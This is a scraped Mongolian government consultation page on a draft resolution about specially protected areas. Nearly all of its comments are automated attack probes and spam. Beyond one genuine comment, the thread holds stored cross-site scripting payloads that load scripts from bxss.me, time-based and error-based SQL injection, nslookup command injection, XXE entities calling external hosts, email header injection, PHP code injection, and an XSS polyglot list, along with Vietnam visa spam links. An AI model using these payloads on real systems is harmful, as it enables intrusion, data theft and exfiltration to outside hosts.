Зарим газар нутгийг улсын тусгай хамгаалалтад авах тухай УИХ-ын тогтоолын төсөлд саналаа өгнө үү?

 

  1. 66.181.187.157 says:

    Засгийн газар, Их хурал дэмжээсэй олон сайхан газар хамрагдсан байна.

  2. 27.255.94.83 says:

    </script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=051664&r=132-78&h=132-f7222-2&/).slice(2),document.documentElement.appendChild(s))//'>

  3. 27.255.94.83 says:

    -1' OR 2+328-328-1=0+0+0+1 or 'oNGUoD9k'='

  4. 27.255.94.83 says:

    if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

  5. 27.255.94.83 says:

    (select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

  6. 27.255.94.83 says:

    1||UTL_INADDR.get_host_address('dns.'||'sqli.051664.132-81.132.f7222.1.bxss'||'.me')

  7. 27.255.94.83 says:

    '>"><script src=http://bxss.me/s?u=051664&r=132-83&h=132-f7222-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,051664,132-83,132,f7222,%22%5D"/>

  8. 27.255.94.83 says:

    '||UTL_INADDR.get_host_address('dns.'||'sqli.051664.132-84.132.f7222.1.bxss'||'.me')||'

  9. 27.255.94.83 says:

    1;copy (select '') to program 'nslookup dns.sqli.\051664.132-88.132.f7222.\1.bxss.me'

  10. 27.255.94.83 says:

    $(nslookup dns.ce.\051664.132-93.132.f7222.\1.bxss.me)

  11. 27.255.94.83 says:

    1';copy (select '') to program 'nslookup dns.sqli.\051664.132-96.132.f7222.\1.bxss.me

  12. 27.255.94.83 says:

    &nslookup dns.ce.\051664.132-97.132.f7222.\1.bxss.me&'\"`0&nslookup dns.ce.\051664.132-97.132.f7222.\1.bxss.me&`'

  13. 27.255.94.83 says:

    bcc:051664.132-101.132.f7222.1@bxss.me

  14. 27.255.94.83 says:

    to@example.com> bcc:051664.132-105.132.f7222.1@bxss.me

  15. 27.255.94.83 says:

    http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

  16. 27.255.94.83 says:

    1some_inexistent_file_with_long_name.jpg

  17. 27.255.94.83 says:

    http://testasp.vulnweb.com/t/fit.txt?.jpg

  18. 27.255.94.83 says:

    ;print(md5(acunetix_wvs_security_test));

  19. 27.255.94.83 says:

    ';print(md5(acunetix_wvs_security_test));$a='

  20. 27.255.94.83 says:

    ";print(md5(acunetix_wvs_security_test));$a="

  21. 27.255.94.83 says:

    ${@print(md5(acunetix_wvs_security_test))}

  22. 27.255.94.83 says:

    ${@print(md5(acunetix_wvs_security_test))}\

  23. 27.255.94.83 says:

    http://testasp.vulnweb.com/t/xss.html?%00.jpg

  24. 27.255.94.83 says:

    )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  25. 27.255.94.83 says:

    1'"()&%<acx><ScRiPt >rHAO(9662)</ScRiPt>

  26. 27.255.94.83 says:

    '"()&%<acx><ScRiPt >rHAO(9967)</ScRiPt>

  27. 27.255.94.83 says:

    <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://hitwuEqW2OLmO.bxss.me/"> ]> <xxx>&acunetixent;</xxx>

  28. 27.255.94.83 says:

    <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE roottag PUBLIC "-//VSR//PENTEST//EN" "http://hit8QeDtd1bt5.bxss.me/"> <roottag>acunetix</roottag>

  29. 27.255.94.83 says:

    <xi:include href="http://hitXNeIMs6prd.bxss.me/" parse="text"/>

  30. 27.255.94.83 says:

    <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY % xxe SYSTEM "http://hitH5IINDdQoh.bxss.me/"> %xxe; ]>

  31. 27.255.94.83 says:

    <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE body SYSTEM "http://hitp12xqIQzlT.bxss.me/"> <body><method>test</method></body>

  32. 27.255.94.83 says:

    1'"()&%<acx><ScRiPt >AWHh(9582)</ScRiPt>

  33. 27.255.94.83 says:

    '"()&%<acx><ScRiPt >AWHh(9604)</ScRiPt>

  34. 27.255.94.83 says:

    1<ScR<ScRiPt>IpT>AWHh(9895)</sCr<ScRiPt>IpT>

  35. 27.255.94.83 says:

    1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9865></ScRiPt>

  36. 27.255.94.83 says:

    1<video><source onerror="javascript:AWHh(9785)">

  37. 27.255.94.83 says:

    1<isindex type=image src=1 onerror=AWHh(9250)>

  38. 27.255.94.83 says:

    1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9249'>

  39. 27.255.94.83 says:

    1<img src=//testasp.vulnweb.com/t/dot.gif onload=AWHh(9533)>

  40. 27.255.94.83 says:

    %31%3C%53%63%52%69%50%74%20%3E%41%57%48%68%289090%29%3C%2F%73%43%72%69%70%54%3E

  41. 27.255.94.83 says:

    1\u003CScRiPt\AWHh(9133)\u003C/sCripT\u003E

  42. 27.255.94.83 says:

    1<img<!-- --> src=x onerror=alert(9523);//><!-- -->

  43. 27.255.94.83 says:

    1}body{acu:Expre/**/SSion(AWHh(9272))}

  44. 27.255.94.83 says:

    1<% contenteditable onresize=AWHh(9069)>

  45. 27.255.94.83 says:

    1<img sRc='http://attacker-9232/log.php?

  46. 27.255.94.83 says:

    1'"()&%<acx><ScRiPt >AWHh(9830)</ScRiPt>

  47. 27.255.94.83 says:

    '"()&%<acx><ScRiPt >AWHh(9063)</ScRiPt>

  48. 27.255.94.83 says:

    1<ScR<ScRiPt>IpT>AWHh(9636)</sCr<ScRiPt>IpT>

  49. 27.255.94.83 says:

    1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9273></ScRiPt>

  50. 27.255.94.83 says:

    1<video><source onerror="javascript:AWHh(9177)">

  51. 27.255.94.83 says:

    1<isindex type=image src=1 onerror=AWHh(9883)>

  52. 27.255.94.83 says:

    1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9795'>

  53. 27.255.94.83 says:

    1<img src=//testasp.vulnweb.com/t/dot.gif onload=AWHh(9043)>

  54. 27.255.94.83 says:

    %31%3C%53%63%52%69%50%74%20%3E%41%57%48%68%289416%29%3C%2F%73%43%72%69%70%54%3E

  55. 27.255.94.83 says:

    1\u003CScRiPt\AWHh(9211)\u003C/sCripT\u003E

  56. 27.255.94.83 says:

    1<img<!-- --> src=x onerror=alert(9473);//><!-- -->

  57. 27.255.94.83 says:

    1}body{acu:Expre/**/SSion(AWHh(9210))}

  58. 27.255.94.83 says:

    1<% contenteditable onresize=AWHh(9649)>

  59. 27.255.94.83 says:

    1<img sRc='http://attacker-9776/log.php?

  60. 27.255.94.83 says:

    </script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=051664&r=412-123&h=412-7b62b-2&/).slice(2),document.documentElement.appendChild(s))//'>

  61. 27.255.94.83 says:

    '>"><script src=http://bxss.me/s?u=051664&r=412-124&h=412-7b62b-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,051664,412-124,412,7b62b,%22%5D"/>

  62. 27.255.94.83 says:

    -1' OR 2+604-604-1=0+0+0+1 or '5GwMcbGB'='

  63. 27.255.94.83 says:

    if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

  64. 27.255.94.83 says:

    $(nslookup dns.ce.\051664.412-127.412.7b62b.\1.bxss.me)

  65. 27.255.94.83 says:

    (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

  66. 27.255.94.83 says:

    &nslookup dns.ce.\051664.412-129.412.7b62b.\1.bxss.me&'\"`0&nslookup dns.ce.\051664.412-129.412.7b62b.\1.bxss.me&`'

  67. 27.255.94.83 says:

    bcc:051664.412-133.412.7b62b.1@bxss.me

  68. 27.255.94.83 says:

    to@example.com> bcc:051664.412-134.412.7b62b.1@bxss.me

  69. 27.255.94.83 says:

    1||UTL_INADDR.get_host_address('dns.'||'sqli.051664.412-137.412.7b62b.1.bxss'||'.me')

  70. 27.255.94.83 says:

    '||UTL_INADDR.get_host_address('dns.'||'sqli.051664.412-138.412.7b62b.1.bxss'||'.me')||'

  71. 27.255.94.83 says:

    1;copy (select '') to program 'nslookup dns.sqli.\051664.412-139.412.7b62b.\1.bxss.me'

  72. 27.255.94.83 says:

    1';copy (select '') to program 'nslookup dns.sqli.\051664.412-140.412.7b62b.\1.bxss.me

  73. 27.255.94.83 says:

    http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

  74. 27.255.94.83 says:

    1some_inexistent_file_with_long_name.jpg

  75. 27.255.94.83 says:

    http://testasp.vulnweb.com/t/fit.txt?.jpg

  76. 27.255.94.83 says:

    ;print(md5(acunetix_wvs_security_test));

  77. 27.255.94.83 says:

    ';print(md5(acunetix_wvs_security_test));$a='

  78. 27.255.94.83 says:

    ";print(md5(acunetix_wvs_security_test));$a="

  79. 27.255.94.83 says:

    ${@print(md5(acunetix_wvs_security_test))}

  80. 27.255.94.83 says:

    http://testasp.vulnweb.com/t/xss.html?%00.jpg

  81. 27.255.94.83 says:

    ${@print(md5(acunetix_wvs_security_test))}\

  82. 27.255.94.83 says:

    )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  83. 27.255.94.83 says:

    <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://hitDbXCZO3FHx.bxss.me/"> ]> <xxx>&acunetixent;</xxx>

  84. 27.255.94.83 says:

    1'"()&%<acx><ScRiPt >atah(9063)</ScRiPt>

  85. 27.255.94.83 says:

    <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE roottag PUBLIC "-//VSR//PENTEST//EN" "http://hitixNS8fyXAq.bxss.me/"> <roottag>acunetix</roottag>

  86. 27.255.94.83 says:

    '"()&%<acx><ScRiPt >atah(9714)</ScRiPt>

  87. 27.255.94.83 says:

    <xi:include href="http://hitE6Dujt2jVz.bxss.me/" parse="text"/>

  88. 27.255.94.83 says:

    <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY % xxe SYSTEM "http://hitJcEX2jk4fJ.bxss.me/"> %xxe; ]>

  89. 27.255.94.83 says:

    <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE body SYSTEM "http://hitT3oHqMc2aP.bxss.me/"> <body><method>test</method></body>

  90. 27.255.94.83 says:

    1'"()&%<acx><ScRiPt >898R(9272)</ScRiPt>

  91. 27.255.94.83 says:

    '"()&%<acx><ScRiPt >898R(9062)</ScRiPt>

  92. 27.255.94.83 says:

    1<ScR<ScRiPt>IpT>898R(9322)</sCr<ScRiPt>IpT>

  93. 27.255.94.83 says:

    1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9314></ScRiPt>

  94. 27.255.94.83 says:

    1<video><source onerror="javascript:898R(9489)">

  95. 27.255.94.83 says:

    1<isindex type=image src=1 onerror=898R(9067)>

  96. 27.255.94.83 says:

    1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9854'>

  97. 27.255.94.83 says:

    1<img src=//testasp.vulnweb.com/t/dot.gif onload=898R(9398)>

  98. 27.255.94.83 says:

    %31%3C%53%63%52%69%50%74%20%3E%38%39%38%52%289896%29%3C%2F%73%43%72%69%70%54%3E

  99. 27.255.94.83 says:

    1\u003CScRiPt\898R(9608)\u003C/sCripT\u003E

  100. 27.255.94.83 says:

    1<img<!-- --> src=x onerror=alert(9774);//><!-- -->

  101. 27.255.94.83 says:

    1}body{acu:Expre/**/SSion(898R(9733))}

  102. 27.255.94.83 says:

    1<% contenteditable onresize=898R(9260)>

  103. 27.255.94.83 says:

    1<img sRc='http://attacker-9721/log.php?

  104. 27.255.94.83 says:

    1'"()&%<acx><ScRiPt >898R(9730)</ScRiPt>

  105. 27.255.94.83 says:

    '"()&%<acx><ScRiPt >898R(9811)</ScRiPt>

  106. 27.255.94.83 says:

    1<ScR<ScRiPt>IpT>898R(9476)</sCr<ScRiPt>IpT>

  107. 27.255.94.83 says:

    1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9285></ScRiPt>

  108. 27.255.94.83 says:

    1<video><source onerror="javascript:898R(9266)">

  109. 27.255.94.83 says:

    1<isindex type=image src=1 onerror=898R(9287)>

  110. 27.255.94.83 says:

    1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9308'>

  111. 27.255.94.83 says:

    1<img src=//testasp.vulnweb.com/t/dot.gif onload=898R(9527)>

  112. 27.255.94.83 says:

    %31%3C%53%63%52%69%50%74%20%3E%38%39%38%52%289583%29%3C%2F%73%43%72%69%70%54%3E

  113. 27.255.94.83 says:

    1\u003CScRiPt\898R(9882)\u003C/sCripT\u003E

  114. 27.255.94.83 says:

    1<img<!-- --> src=x onerror=alert(9500);//><!-- -->

  115. 27.255.94.83 says:

    1}body{acu:Expre/**/SSion(898R(9077))}

  116. 27.255.94.83 says:

    1<% contenteditable onresize=898R(9372)>

  117. 27.255.94.83 says:

    1<img sRc='http://attacker-9515/log.php?

  118. 14.231.181.110 says:

    <a href=https://google.com>google.com</a> [url=https://google.com]google.com[/url]

  119. 14.231.181.110 says:

    Получение Вьетнамской визы для туристов <a href=https://getvietnamvisa.com>https://getvietnamvisa.com</a>

  120. 14.231.181.110 says:

    Отели Вьетнама <a href=https://www.hotels-in-vietnam.com>www.hotels-in-vietnam.com></a>

  121. 89.187.189.193 says:

    <img src=x onerror=document.body.innerHTML=location.hash>#"><img src=x onerror=prompt(1)> "><img src=x onerror=document.body.innerHTML=location.hash>#"><img src=x onerror=prompt(1)> '><img src=x onerror=document.body.innerHTML=location.hash>#"><img src=x onerror=prompt(1)> "><img src=x onerror=prompt(1)> '><img src=x onerror=prompt(1)> <img src=x onerror=document.body.innerHTML=location.hash>#"><img/src='x'onerror=prompt(1)> "><img src=x onerror=document.body.innerHTML=location.hash>#"><img/src='x'onerror=prompt(1)> '><img src=x onerror=document.body.innerHTML=location.hash>#"><img/src='x'onerror=prompt(1)> <img src=x onerror=document.body.innerHTML=location.hash>#<img src=x onerror=prompt(1)> "><img src=x onerror=document.body.innerHTML=location.hash>#<img src=x onerror=prompt(1)> '><img src=x onerror=document.body.innerHTML=location.hash>#<img src=x onerror=prompt(1)> "><img src=x onerror=prompt(1)> '><img src=x onerror=prompt(1)> <img src=x onerror=document.body.innerHTML=location.hash>#<img/src='x'onerror=prompt(1)> "><img src=x onerror=document.body.innerHTML=location.hash>#<img/src='x'onerror=prompt(1)> '><img src=x onerror=document.body.innerHTML=location.hash>#<img/src='x'onerror=prompt(1)> <svg onload=document.body.innerHTML=location.hash>#<img src=x onerror=alert(1)> "><svg onload=document.body.innerHTML=location.hash>#<img src=x onerror=alert(1)> '><svg onload=document.body.innerHTML=location.hash>#<img src=x onerror=alert(1)> <svg onload=document.body.innerHTML=location.hash>#<img src='x'onerror=alert(1)> "><svg onload=document.body.innerHTML=location.hash>#<img src='x'onerror=alert(1)> '><svg onload=document.body.innerHTML=location.hash>#<img src='x'onerror=alert(1)> <svg onload=document.body.innerHTML=location.hash>#<svg onload=prompt(1)> "><svg onload=document.body.innerHTML=location.hash>#<svg onload=prompt(1)> '><svg onload=document.body.innerHTML=location.hash>#<svg onload=prompt(1)> <svg onload=document.body.innerHTML=location.hash>#<svg/onload=prompt(1)> "><svg onload=document.body.innerHTML=location.hash>#<svg/onload=prompt(1)> '><svg onload=document.body.innerHTML=location.hash>#<svg/onload=prompt(1)> --!><svg onload=prompt(1) eval(((_=!1)+{})[1]+(_+{})[2]+(_+{})[4]+((_=!!1)+{})[1]+(_+{})[0]+((_=>(_))+1)[3]+1+((_=>(_))+1)[5]) eval((_=!0+(()=>0)+!1)[10]+_[11]+_[3]+_[1]+_[0]+_[4]+1+_[5]) <marquee>alert( `X :)`)</marquee> "><marquee>alert( `X :)`)</marquee> '><marquee>alert( `X :)`)</marquee> <"script">"alert(0)"</"script"> "><"script">"alert(0)"</"script"> '><"script">"alert(0)"</"script"> <s[NULL]cript>alert(1)</s[NULL]cript>'>X</a> "><s[NULL]cript>alert(1)</s[NULL]cript>'>X</a> '><s[NULL]cript>alert(1)</s[NULL]cript>'>X</a> <video><source o?UTF-8?Q?n?error="alert(1)"> "><video><source o?UTF-8?Q?n?error="alert(1)"> '><video><source o?UTF-8?Q?n?error="alert(1)"> <body scroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> "><body scroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> '><body scroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> <meta charset="x-mac-farsi">??script ??alert(1)//??/script ?? "><meta charset="x-mac-farsi">??script ??alert(1)//??/script ?? '><meta charset="x-mac-farsi">??script ??alert(1)//??/script ?? <x onload'=alert(1) "><x onload'=alert(1) '><x onload'=alert(1) <sc'+'ript>alert(1)</script> "><sc'+'ript>alert(1)</script> '><sc'+'ript>alert(1)</script> <FRAMESET><FRAME RC=""+"javascript:alert('X');"></FRAMESET> "><FRAMESET><FRAME RC=""+"javascript:alert('X');"></FRAMESET> '><FRAMESET><FRAME RC=""+"javascript:alert('X');"></FRAMESET> </script>"//'//<svg%0Aonload=alert(1)//> "></script>"//'//<svg%0Aonload=alert(1)//> '></script>"//'//<svg%0Aonload=alert(1)//> '//</script><svg%20"%0aonload=alert(1)%20//> </script>'//<svg "%0Aonload=alert(1) //> "></script>'//<svg "%0Aonload=alert(1) //> '></script>'//<svg "%0Aonload=alert(1) //> '//</script><svg "%0Aonload=alert(1)// /> </script>"//'//<svg%0Aonload=alert(1) //> "></script>"//'//<svg%0Aonload=alert(1) //>

  122. 116.204.211.188 says:

    C'and/**/extractvalue(1,concat(char(126),md5(1004257655)))and'

  123. 116.204.211.188 says:

    C"and/**/extractvalue(1,concat(char(126),md5(1912355409)))and"

  124. 116.204.211.188 says:

    extractvalue(1,concat(char(126),md5(1299544671)))

  125. 116.204.211.188 says:

    C'and(select'1'from/**/cast(md5(1917229788)as/**/int))>'0

  126. 116.204.211.188 says:

    C/**/and/**/cast(md5('1140829684')as/**/int)>0

  127. 116.204.211.188 says:

    convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1354646338')))

  128. 116.204.211.188 says:

    C'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1913243814')))>'0

  129. 116.204.211.188 says:

    C'and(select*from(select+sleep(0))a/**/union/**/select+1)='

  130. 116.204.211.188 says:

    C'and(select*from(select+sleep(2))a/**/union/**/select+1)='

  131. 116.204.211.188 says:

    C"and(select*from(select+sleep(0))a/**/union/**/select+1)="

  132. 116.204.211.188 says:

    C"and(select*from(select+sleep(2))a/**/union/**/select+1)="

  133. 116.204.211.188 says:

    C'/**/and(select'1'from/**/pg_sleep(0))::text>'0

  134. 116.204.211.188 says:

    C'/**/and(select'1'from/**/pg_sleep(2))::text>'0

  135. 116.204.211.188 says:

    C'and(select+1)>0waitfor/**/delay'0:0:0

  136. 116.204.211.188 says:

    C'and(select+1)>0waitfor/**/delay'0:0:2

  137. 116.204.211.188 says:

    C'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('d',0)='d

  138. 116.204.211.188 says:

    C'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',2)='z